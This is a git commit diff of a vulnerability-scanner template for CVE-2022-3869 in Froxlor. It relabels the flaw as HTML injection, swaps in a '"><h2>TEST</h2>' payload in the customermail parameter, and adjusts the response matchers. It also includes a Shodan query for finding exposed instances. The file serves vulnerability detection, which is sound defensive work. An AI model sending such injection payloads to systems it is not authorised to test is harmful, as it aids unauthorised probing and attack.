fix matcher & payload

patch-10
Ritik Chaddha 2024-08-16 09:01:18 +04:00 committed by GitHub
parent 64bc15c29e
commit adb1912916
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 16 additions and 7 deletions

View File

@ -1,34 +1,43 @@
id: CVE-2022-3869
info:
name: Froxlor < 0.10.38.2. - Code Injection
name: Froxlor < 0.10.38.2. - HTML Injection
author: ctflearner
severity: medium
description: |
Code Injection in GitHub repository froxlor/froxlor prior to 0.10.38.2.
HTML Injection in GitHub repository froxlor/froxlor prior to 0.10.38.2.
reference:
- https://huntr.com/bounties/7de20f21-4a9b-445d-ae2b-15ade648900b
- https://nvd.nist.gov/vuln/detail/CVE-2022-3869
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-3869
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
shodan-query: title:"Froxlor"
product: Froxlor
tags: cve2023,cve,huntr,Froxlor,reflectedxss,Injection,codeinjection
tags: cve2023,cve,froxlor,html
http:
- method: GET
path:
- "{{BaseURL}}/index.php?showmessage=4&customermail=%22%3Cmarquee%3E%3Ch3%3EHTML/INJECTION/HERE%22@x.y"
- "{{BaseURL}}/index.php?showmessage=4&customermail=\"><h2>TEST</h2>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "HTML INJECTION"
- 'The message to ""><h2>TEST</h2>" failed'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200